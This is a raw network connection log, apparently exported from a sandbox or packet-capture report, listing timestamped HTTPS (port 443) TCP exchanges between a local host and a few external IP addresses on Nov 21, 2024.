                                                                                                                                                                      Nov 21, 2024 06:23:28.747356892 CET4434973852.149.20.212192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:28.946028948 CET4434973713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:28.946099043 CET4434973713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:28.946206093 CET49737443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:28.946346045 CET49737443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:28.946367025 CET4434973713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:28.946379900 CET49737443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:28.946386099 CET4434973713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:28.950407982 CET49746443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:28.950436115 CET4434974613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:28.950902939 CET49746443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:28.951100111 CET49746443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:28.951113939 CET4434974613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:29.395937920 CET4434973852.149.20.212192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:29.395972013 CET4434973852.149.20.212192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:29.395978928 CET4434973852.149.20.212192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:29.395987988 CET4434973852.149.20.212192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:29.396003962 CET4434973852.149.20.212192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:29.396048069 CET49738443192.168.2.652.149.20.212
                                                                                                                                                                      Nov 21, 2024 06:23:29.396065950 CET4434973852.149.20.212192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:29.396102905 CET49738443192.168.2.652.149.20.212
                                                                                                                                                                      Nov 21, 2024 06:23:29.396117926 CET49738443192.168.2.652.149.20.212
                                                                                                                                                                      Nov 21, 2024 06:23:29.543492079 CET4434973852.149.20.212192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:29.543587923 CET4434973852.149.20.212192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:29.543600082 CET49738443192.168.2.652.149.20.212
                                                                                                                                                                      Nov 21, 2024 06:23:29.543665886 CET49738443192.168.2.652.149.20.212
                                                                                                                                                                      Nov 21, 2024 06:23:29.543848038 CET49738443192.168.2.652.149.20.212
                                                                                                                                                                      Nov 21, 2024 06:23:29.543874979 CET4434973852.149.20.212192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:29.543884039 CET49738443192.168.2.652.149.20.212
                                                                                                                                                                      Nov 21, 2024 06:23:29.543890953 CET4434973852.149.20.212192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:29.725748062 CET44349740188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:29.725841045 CET49740443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:29.727237940 CET49740443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:29.727247953 CET44349740188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:29.727627039 CET44349740188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:29.729069948 CET49740443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:29.729877949 CET49740443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:29.729919910 CET44349740188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:29.730384111 CET49740443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:29.730424881 CET44349740188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:29.730604887 CET49740443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:29.730659962 CET44349740188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:29.730864048 CET49740443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:29.730907917 CET44349740188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:29.731065035 CET49740443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:29.731113911 CET44349740188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:29.731303930 CET49740443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:29.731350899 CET44349740188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:29.731364012 CET49740443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:29.731372118 CET44349740188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:29.731554985 CET49740443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:29.731587887 CET44349740188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:29.731623888 CET49740443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:29.731759071 CET49740443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:29.731794119 CET49740443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:29.775338888 CET44349740188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:29.775552034 CET49740443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:29.775607109 CET44349740188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:29.775641918 CET49740443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:29.775655985 CET44349740188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:29.775700092 CET49740443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:29.775723934 CET44349740188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:30.303143978 CET4434974113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:30.303595066 CET49741443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:30.303631067 CET4434974113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:30.304081917 CET49741443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:30.304086924 CET4434974113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:30.384689093 CET4434974413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:30.385232925 CET49744443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:30.385251999 CET4434974413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:30.385873079 CET49744443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:30.385879040 CET4434974413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:30.421020985 CET4434974213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:30.421427011 CET49742443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:30.421457052 CET4434974213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:30.421858072 CET49742443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:30.421864986 CET4434974213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:30.513046026 CET4434974313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:30.513411999 CET49743443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:30.513443947 CET4434974313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:30.513895035 CET49743443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:30.513900042 CET4434974313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:30.729178905 CET4434974613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:30.729727030 CET49746443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:30.729754925 CET4434974613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:30.730231047 CET49746443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:30.730237007 CET4434974613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:30.737338066 CET4434974113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:30.737399101 CET4434974113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:30.737498999 CET49741443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:30.737567902 CET49741443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:30.737588882 CET4434974113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:30.737598896 CET49741443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:30.737603903 CET4434974113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:30.739896059 CET49747443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:30.739986897 CET4434974713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:30.740084887 CET49747443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:30.740251064 CET49747443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:30.740288973 CET4434974713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:30.818376064 CET4434974413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:30.818425894 CET4434974413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:30.818665028 CET49744443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:30.818691969 CET49744443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:30.818706036 CET4434974413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:30.818717957 CET49744443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:30.818722963 CET4434974413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:30.821356058 CET49748443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:30.821403027 CET4434974813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:30.821650028 CET49748443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:30.821804047 CET49748443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:30.821820021 CET4434974813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:30.866321087 CET4434974213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:30.866386890 CET4434974213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:30.866537094 CET49742443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:30.866761923 CET49742443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:30.866761923 CET49742443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:30.866780996 CET4434974213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:30.866789103 CET4434974213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:30.869880915 CET49749443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:30.869904041 CET4434974913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:30.870053053 CET49749443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:30.870188951 CET49749443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:30.870203018 CET4434974913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:30.969676971 CET4434974313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:30.969743967 CET4434974313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:30.969809055 CET49743443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:30.970040083 CET49743443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:30.970062017 CET4434974313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:30.970072985 CET49743443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:30.970078945 CET4434974313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:30.973525047 CET49750443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:30.973547935 CET4434975013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:30.973604918 CET49750443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:30.973793983 CET49750443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:30.973809004 CET4434975013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:31.174937963 CET4434974613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:31.174999952 CET4434974613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:31.175219059 CET49746443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:31.175288916 CET49746443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:31.175288916 CET49746443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:31.175328016 CET4434974613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:31.175355911 CET4434974613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:31.178777933 CET49752443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:31.178802013 CET4434975213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:31.179049015 CET49752443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:31.179272890 CET49752443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:31.179286957 CET4434975213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:32.520395994 CET4434974713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:32.521173000 CET49747443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:32.521208048 CET4434974713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:32.521671057 CET49747443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:32.521678925 CET4434974713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:32.537741899 CET4434974813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:32.538137913 CET49748443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:32.538156033 CET4434974813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:32.538714886 CET49748443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:32.538722038 CET4434974813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:32.648721933 CET4434974913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:32.649250031 CET49749443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:32.649281025 CET4434974913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:32.652064085 CET49749443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:32.652071953 CET4434974913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:32.689568043 CET4434975013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:32.690077066 CET49750443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:32.690093994 CET4434975013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:32.690579891 CET49750443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:32.690584898 CET4434975013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:32.891527891 CET4434975213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:32.894397020 CET49752443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:32.894412041 CET4434975213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:32.894953966 CET49752443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:32.894965887 CET4434975213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:32.970530033 CET4434974713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:32.970604897 CET4434974713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:32.970746040 CET49747443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:32.970860958 CET49747443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:32.970861912 CET49747443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:32.970932961 CET4434974713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:32.970962048 CET4434974713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:32.972414017 CET4434974813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:32.972498894 CET4434974813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:32.973066092 CET49748443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:32.973223925 CET49748443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:32.973249912 CET4434974813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:32.973257065 CET49748443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:32.973262072 CET4434974813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:32.974333048 CET49753443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:32.974378109 CET4434975313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:32.974461079 CET49753443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:32.974631071 CET49753443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:32.974647999 CET4434975313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:32.975594044 CET49754443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:32.975627899 CET4434975413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:32.975955009 CET49754443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:32.976109028 CET49754443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:32.976120949 CET4434975413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:33.093699932 CET4434974913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:33.093782902 CET4434974913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:33.093904972 CET49749443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:33.094104052 CET49749443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:33.094126940 CET4434974913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:33.094137907 CET49749443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:33.094144106 CET4434974913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:33.097053051 CET49755443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:33.097095013 CET4434975513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:33.097188950 CET49755443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:33.097340107 CET49755443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:33.097356081 CET4434975513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:33.124850988 CET4434975013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:33.124933004 CET4434975013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:33.125155926 CET49750443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:33.125202894 CET49750443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:33.125226021 CET4434975013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:33.125236034 CET49750443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:33.125241995 CET4434975013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:33.128540039 CET49756443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:33.128570080 CET4434975613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:33.128674984 CET49756443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:33.128849030 CET49756443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:33.128859997 CET4434975613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:33.325274944 CET4434975213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:33.325351000 CET4434975213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:33.325584888 CET49752443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:33.325659037 CET49752443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:33.325659037 CET49752443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:33.325671911 CET4434975213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:33.325680017 CET4434975213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:33.328661919 CET49757443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:33.328713894 CET4434975713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:33.328795910 CET49757443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:33.329004049 CET49757443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:33.329018116 CET4434975713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:33.541062117 CET44349740188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:33.541157961 CET44349740188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:33.541333914 CET49740443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:33.541383028 CET49740443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:33.555942059 CET49758443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:33.555979013 CET44349758188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:33.556092978 CET49758443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:33.556365013 CET49758443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:33.556380033 CET44349758188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:34.762293100 CET4434975313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:34.762809038 CET49753443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:34.762826920 CET4434975313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:34.764297009 CET49753443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:34.764302969 CET4434975313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:34.813303947 CET44349758188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:34.813513994 CET49758443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:34.816725016 CET49758443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:34.816745043 CET44349758188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:34.816986084 CET44349758188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:34.822051048 CET4434975413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:34.825695038 CET49758443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:34.825695038 CET49758443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:34.825774908 CET44349758188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:34.826492071 CET49754443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:34.826507092 CET4434975413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:34.826673031 CET49754443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:34.826678038 CET4434975413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:34.875433922 CET4434975513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:34.875811100 CET49755443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:34.875825882 CET4434975513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:34.876194954 CET49755443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:34.876205921 CET4434975513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:34.918072939 CET4434975613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:34.918612957 CET49756443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:34.918643951 CET4434975613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:34.918857098 CET49756443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:34.918862104 CET4434975613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:35.173923969 CET4434975713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:35.174617052 CET49757443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:35.174635887 CET4434975713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:35.175096035 CET49757443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:35.175101042 CET4434975713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:35.283642054 CET4434975413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:35.283734083 CET4434975413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:35.283809900 CET49754443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:35.287941933 CET49754443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:35.287957907 CET4434975413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:35.287996054 CET49754443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:35.288002968 CET4434975413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:35.292150021 CET49759443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:35.292188883 CET4434975913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:35.292263985 CET49759443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:35.292465925 CET49759443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:35.292478085 CET4434975913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:35.320432901 CET4434975513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:35.320507050 CET4434975513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:35.320555925 CET49755443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:35.320724964 CET49755443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:35.320744991 CET4434975513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:35.320769072 CET49755443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:35.320775032 CET4434975513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:35.323543072 CET49760443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:35.323587894 CET4434976013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:35.323672056 CET49760443192.168.2.613.107.246.45
